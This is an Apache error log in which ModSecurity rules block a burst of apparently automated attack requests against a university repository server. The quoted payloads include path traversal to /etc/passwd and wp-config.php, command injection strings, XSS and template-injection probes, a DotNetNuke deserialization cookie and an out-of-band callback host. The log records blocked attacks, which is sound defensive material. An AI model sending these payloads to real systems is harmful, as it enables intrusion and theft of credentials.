[Tue Aug 29 11:42:08.382034 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAc92vsAAAAD"]
[Tue Aug 29 11:42:09.360582 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IcCo-f0AAAbo-acAAAAi"]
[Tue Aug 29 11:42:09.405673 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdeQzQAAAAQ"]
[Tue Aug 29 11:42:11.379899 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAcvBi8AAAAJ"]
[Tue Aug 29 11:42:11.431495 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAddJqUAAAAh"]
[Tue Aug 29 11:42:12.407804 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAc@cWwAAAAL"]
[Tue Aug 29 11:42:14.357160 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAc36z8AAAAO"]
[Tue Aug 29 11:42:14.359007 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdKXNgAAAAK"]
[Tue Aug 29 11:42:14.431292 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdeQz4AAAAQ"]
[Tue Aug 29 11:42:15.389601 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdhHysAAAAB"]
[Tue Aug 29 11:42:17.410763 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdECbEAAAAW"]
[Tue Aug 29 11:42:19.382241 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdb7jMAAAAb"]
[Tue Aug 29 11:42:19.414020 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdi9@EAAAAk"]
[Tue Aug 29 11:42:21.565615 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdZZqYAAAAf"]
[Tue Aug 29 11:42:23.414788 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdSZLgAAAAX"]
[Tue Aug 29 11:42:24.376061 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdUc1UAAAAZ"]
[Tue Aug 29 11:42:25.374634 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdsFgcAAAAo"]
[Tue Aug 29 11:42:26.384103 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAbo-ccAAAAi"]
[Tue Aug 29 11:42:27.359933 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAc92x8AAAAD"]
[Tue Aug 29 11:42:27.407760 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdSZL4AAAAX"]
[Tue Aug 29 11:42:28.427429 2023] [:error] [pid 1911] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAd3rGYAAAAe"]
[Tue Aug 29 11:42:30.393649 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NsCo-f0AAAdZZrkAAAAf"]
[Tue Aug 29 11:42:32.398556 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26go4eb47k8q1mmh.oast.site found within TX:1: cjmnbitjmimt14dgn26go4eb47k8q1mmh.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAd230gAAAAI"]
[Tue Aug 29 11:42:32.459138 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "repositoryfh.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdOeRcAAAAS"]
[Tue Aug 29 11:42:34.372766 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAdlvbUAAAAl"]
[Tue Aug 29 11:42:34.417644 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAcvBlIAAAAJ"]
[Tue Aug 29 11:42:40.492786 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAdXInQAAAAd"]
[Tue Aug 29 11:42:41.408211 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAdOeSIAAAAS"]
[Tue Aug 29 11:42:41.413663 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QcCo-f0AAAd-FzkAAAAt"]
